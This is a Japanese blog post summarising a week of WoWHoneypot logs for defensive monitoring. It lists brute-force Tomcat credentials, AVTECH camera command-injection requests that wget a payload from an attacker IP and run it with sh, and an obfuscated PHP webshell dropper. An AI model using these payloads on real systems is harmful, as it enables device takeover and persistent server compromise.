【ハニーポット】WoWHoneypot簡易分析(9/14-9/20)
現在、HoneytrapとHoneypotの両方を監視しているのですが、WoWHoneypotについてあまり纏めていなかったので、週次で記事を書いていこうと思います。
◾️WoWHoneypot
<検知傾向>
<検知数>
10/15の検知が非常に多く、検知内容の大半がTomcat Managerへのアクセスでした。
Basic認証を突破しようとする総当たり攻撃でしたが、ユーザー名とパスワードはよく利用されそうなものでした。
例:
123:1q2w3e4r
123:P@$$w0rd1234
123456:1qazXSW@
admin:123
admin:Pa$$w0rd@0
manager:P@$$w0rd1
role1:P@$$w0rd@123456
tomcat:nimda
<マルウェアダウンロード>
AVTECH IP Camera の脆弱性を狙った攻撃を検知していました。他のハニーポッターの方でも検知していたとの報告が多数上がっています。
ダウンロード先 | ペイロード | 検知数 |
hxxp://209[.]141[.]40[.]213/dlink | GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://xxx.xxx.xxx.xxx/dlink%20-O%20-%3E%20/tmp/gexoe;sh%20/tmp/gexoe%27$ HTTP/1.1.Connection: keep-alive.Accept-Encoding: gzip, deflate.Accept: */*.User-Agent: Sefa.. | 12 |
hxxp://209[.]141[.]40[.]213/avtech | GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20/tmp;%20wget%20hxxp://xxx.xxx.xxx.xxx/avtech%20-O%20niXd;%20chmod%20777%20niXd;%20sh%20niXd)&password=admin HTTP/1.1.User-Agent: Sefa.Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8.Accept-Language: en-GB,en;q=0.5.Accept-Encoding: gzip, deflate.Connection: close.. | 13 |
<検知状況>
圧倒的にTomcat Managerへのアクセスが多かったです。
メソッド | パス | 検知数 |
GET | /manager/html | 4775 |
GET | / | 226 |
GET | /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget hxxp://xxx.xxx.xxx.xxx/avtech -O niXd; chmod 777 niXd; sh niXd)&password=admin | 12 |
POST | /wls-wsat/CoordinatorPortType | 9 |
GET | hxxp://xxx.xxx.xxx.xxx/testget?q=23333&port=80 | 5 |
GET | /admin/assets/js/views/login.js | 4 |
GET | /wls-wsat/CoordinatorPortType | 4 |
HEAD | / | 4 |
GET | /HNAP1/ | 3 |
POST | /GponForm/diag_Form?images/ | 3 |
GET | //MyAdmin/scripts/setup.php | 2 |
GET | //myadmin/scripts/setup.php | 2 |
GET | //phpMyAdmin/scripts/setup.php | 2 |
GET | //phpmyadmin/scripts/setup.php | 2 |
GET | //pma/scripts/setup.php | 2 |
GET | /admin/phpMyAdmin/index.php | 2 |
GET | /claroline/phpMyAdmin/index.php | 2 |
GET | /index/article/lists/cid/3 | 2 |
GET | /login.cgi?cli=aa aa';wget hxxp://xxx.xxx.xxx.xxx/dlink -O -> /tmp/gexoe;sh /tmp/gexoe'$ | 2 |
GET | /muieblackcat | 2 |
GET | /phpMyAdmin/phpMyAdmin/index.php | 2 |
GET | /phpmyadmin/ | 2 |
GET | /tools/phpMyAdmin/index.php | 2 |
GET | /web/cgi-bin/hi3510/param.cgi?cmd=getp2pattr&cmd=getuserattr | 2 |
GET | /web/phpMyAdmin/index.php | 2 |
GET | /www/phpMyAdmin/index.php | 2 |
PROPFIND | / | 2 |
CONNECT | cn.bing.com:443 | 1 |
CONNECT | www.baidu.com:443 | 1 |
GET | /.bitcoin/wallet.dat | 1 |
GET | /.well-known/security.txt | 1 |
GET | //php/phpmyadmin/scripts/setup.php | 1 |
GET | //phpMyAdmin-2.6.9/scripts/setup.php | 1 |
GET | //phpMyAdmin-xxx.xxx.xxx.xxx/scripts/setup.php | 1 |
GET | /?XDEBUG_SESSION_START=phpstorm | 1 |
GET | /?a=<foo> | 1 |
GET | /PMA/index.php | 1 |
GET | /PMA2/index.php | 1 |
GET | /admin/PMA/index.php | 1 |
GET | /admin/index.php | 1 |
GET | /admin/mysql/index.php | 1 |
GET | /admin/mysql2/index.php | 1 |
GET | /admin/phpmyadmin/index.php | 1 |
GET | /admin/phpmyadmin2/index.php | 1 |
GET | /admin/pma/index.php | 1 |
GET | /ccvv | 1 |
GET | /cmx.php?cmd=echo "<?php \$func='c'.'r'.'e'.'a'.'t'.'e'.'_'.'f'.'u'.'n'.'c'.'t'.'i'.'o'.'n';\$test=\$func('\$x','e'.'v'.'a'.'l'.'(b'.'a'.'s'.'e'.'6'.'4'.'_'.'d'.'e'.'c'.'o'.'d'.'e(\$x));');\$test('QHNlc3Npb25fc3RhcnQoKTtpZihpc3NldCgkX1BPU1RbJ2NvZGUnXSkpeyhzdWJzdHIoc2hhMShtZDUoQCRfUE9TVFsnYSddKSksMzYpPT0nMjIyZicpJiYkX1NFU1NJT05bJ3RoZUNvZGUnXT10cmltKCRfUE9TVFsnY29kZSddKTt9aWYoaXNzZXQoJF9TRVNTSU9OWyd0aGVDb2RlJ10pKXtAZXZhbChiYXNlNjRfZGVjb2RlKCRfU0VTU0lPTlsndGhlQ29kZSddKSk7fQ=='); ?>" >images.php & echo Hello, Peppa! | 1 |
GET | /cmx.php?cmd=echo ^<?php $func='c'.'r'.'e'.'a'.'t'.'e'.'_'.'f'.'u'.'n'.'c'.'t'.'i'.'o'.'n';$test=$func('$x','e'.'v'.'a'.'l'.'(b'.'a'.'s'.'e'.'6'.'4'.'_'.'d'.'e'.'c'.'o'.'d'.'e($x));');$test('QHNlc3Npb25fc3RhcnQoKTtpZihpc3NldCgkX1BPU1RbJ2NvZGUnXSkpeyhzdWJzdHIoc2hhMShtZDUoQCRfUE9TVFsnYSddKSksMzYpPT0nMjIyZicpJiYkX1NFU1NJT05bJ3RoZUNvZGUnXT10cmltKCRfUE9TVFsnY29kZSddKTt9aWYoaXNzZXQoJF9TRVNTSU9OWyd0aGVDb2RlJ10pKXtAZXZhbChiYXNlNjRfZGVjb2RlKCRfU0VTU0lPTlsndGhlQ29kZSddKSk7fQ=='); ?^> >images.php & echo Hello, Peppa! | 1 |
GET | /console | 1 |
GET | /db/index.php | 1 |
GET | /dbadmin/index.php | 1 |
GET | /favicon.ico | 1 |
GET | /index.php | 1 |
GET | /login.cgi?cli=aa aa';wget hxxp://xxx.xxx.xxx.xxx/t.php'$ | 1 |
GET | /myadmin/index.php | 1 |
GET | /myadmin2/index.php | 1 |
GET | /mysql-admin/index.php | 1 |
GET | /mysql/index.php | 1 |
GET | /mysqladmin/index.php | 1 |
GET | /phpAdmin/index.php | 1 |
GET | /phpMyAbmin/index.php | 1 |
GET | /phpMyAdm1n/index.php | 1 |
GET | /phpMyAdmin ---/index.php | 1 |
GET | /phpMyAdmin-4.4.0/index.php | 1 |
GET | /phpMyAdmin.old/index.php | 1 |
GET | /phpMyAdmin/index.php | 1 |
GET | /phpMyAdmin__/index.php | 1 |
GET | /phpMyAdminold/index.php | 1 |
GET | /phpMyAdmion/index.php | 1 |
GET | /phpMyadmi/index.php | 1 |
GET | /phpMyadmin_bak/index.php | 1 |
GET | /phpadmin/index.php | 1 |
GET | /phpma/index.php | 1 |
GET | /phpmyadm1n/index.php | 1 |
GET | /phpmyadmin | 1 |
GET | /phpmyadmin-old/index.php | 1 |
GET | /phpmyadmin/index.php | 1 |
GET | /phpmyadmin/phpmyadmin/index.php | 1 |
GET | /phpmyadmin0/index.php | 1 |
GET | /phpmyadmin1/index.php | 1 |
GET | /phpmyadmin2/index.php | 1 |
GET | /pma-old/index.php | 1 |
GET | /pma/index.php | 1 |
GET | /pmamy/index.php | 1 |
GET | /pmamy2/index.php | 1 |
GET | /pmd/index.php | 1 |
GET | /robots.txt | 1 |
GET | /shaAdmin/index.php | 1 |
GET | /sitemap.xml | 1 |
GET | /typo3/phpmyadmin/index.php | 1 |
GET | /upload/bank-icons/bank-gh.jpg | 1 |
GET | /upload/bank-icons/bank_16.png | 1 |
GET | /v/index.php | 1 |
GET | /wallet.dat | 1 |
GET | /wallets/wallet.dat | 1 |
GET | /webadmin/tpl/style.admin.css | 1 |
GET | /webdav/ | 1 |
GET | /xampp/phpmyadmin/index.php | 1 |
GET | /yealink/y000000000000.cfg | 1 |
GET | hxxp://api.ipify.org/ | 1 |
GET | hxxp://www.123cha.com/ | 1 |
GET | hxxp://www.ip.cn/ | 1 |
GET | hxxp://xxx.xxx.xxx.xxx/echo.php | 1 |
GET | hxxp://xxx.xxx.xxx.xxx:10083/index.php | 1 |
HEAD | /newhome/img/logo.png | 1 |
HEAD | /static/upload/20180921/th_317a3298794099e0bab477e4f3d732a4.png | 1 |
OPTIONS | /ipc$ | 1 |
POST | / | 1 |
POST | /cmx.php | 1 |
POST | /images.php | 1 |
POST | hxxp://check.proxyradar.com/azenv.php?auth=153944726797&a=PSCN&i=2685440439&p=80 | 1 |
POST | hxxp://check.proxyradar.com/azenv.php?auth=153949072501&a=PSCN&i=2685440439&p=80 | 1 |
POST | hxxp://check.proxyradar.com/azenv.php?auth=153978850135&a=PSCN&i=2685440439&p=80 | 1 |
POST | hxxp://check.proxyradar.com/azenv.php?auth=153981707711&a=PSCN&i=2685440439&p=80 | 1 |
POST | hxxp://check.proxyradar.com/azenv.php?auth=153984761625&a=PSCN&i=2685440439&p=80 | 1 |
POST | hxxp://check.proxyradar.com/azenv.php?auth=153992111173&a=PSCN&i=2685440439&p=80 | 1 |
POST | hxxp://check.proxyradar.com/azenv.php?auth=153994958159&a=PSCN&i=2685440439&p=80 | 1 |
POST | hxxp://check.proxyradar.com/azenv.php?auth=153999669485&a=PSCN&i=2685440439&p=80 | 1 |
POST | hxxp://check.proxyradar.com/azenv.php?auth=154007072173&a=PSCN&i=2685440439&p=80 | 1 |
POST | hxxp://check.proxyradar.com/azenv.php?auth=154012893921&a=PSCN&i=2685440439&p=80 | 1 |
以上、簡易分析となります。